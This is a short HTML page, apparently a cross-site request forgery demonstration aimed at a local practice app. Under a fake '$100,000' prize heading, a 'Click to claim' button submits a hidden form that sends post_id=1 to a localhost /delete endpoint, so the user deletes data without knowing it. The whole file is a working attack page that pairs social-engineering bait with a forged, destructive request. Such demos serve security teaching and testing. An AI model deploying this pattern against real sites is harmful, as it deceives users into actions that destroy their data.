<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Malicious Website</title>
</head>

<body>
    <h1>Trick the User!</h1>
    <form id="hack" action="http://localhost:5000/delete" method="post">
        <!-- CSRF token, replace with appropriate value -->
        <h3>You won $100,000</h3>
        <input type="hidden" name="post_id" value="1">
        <button onClick="hack();" id="button">Click to claim</button>
    </form>
    <script>
        function hack() {
            document.getElementById("hack").submit();
        }
    </script>
</body>

</html>